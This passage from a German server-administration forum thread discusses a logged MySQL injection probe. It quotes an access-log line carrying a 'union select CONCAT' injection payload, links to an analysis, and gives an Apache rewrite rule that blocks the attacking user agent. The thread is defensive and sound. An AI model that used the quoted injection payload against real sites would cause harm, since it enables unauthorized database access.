XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:46 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
Top

Roger Wilco
Administrator
Administrator
Posts: 6001
Joined: 2004-05-23 12:53

Re: MySQL-Injection

Post by Roger Wilco »

Unter http://secshoggoth.blogspot.com/2009/03 ... ttack.html wird genau dieser Angriff analysiert.
Top

evilduffp
Posts: 70
Joined: 2005-07-06 00:14

Re: MySQL-Injection

Post by evilduffp »

Ah super, vielen Dank.
Top

User avatar
Joe User
Project Manager
Project Manager
Posts: 11519
Joined: 2003-02-27 01:00
Location: Hamburg

Re: MySQL-Injection

Post by Joe User »

PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.
Top

User avatar
Joe User
Project Manager
Project Manager
Posts: 11519
Joined: 2003-02-27 01:00
Location: Hamburg

Re: MySQL-Injection

Post by Joe User »

http://whitehatsecurityresponse.blogspo ... s-and.html

Code: Select all

RewriteCond %{HTTP_USER_AGENT} (32ts|32Sn) [NC]
RewriteRule ^(.*)$ http://256.256.256.256/ [R=301,L]
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.
Top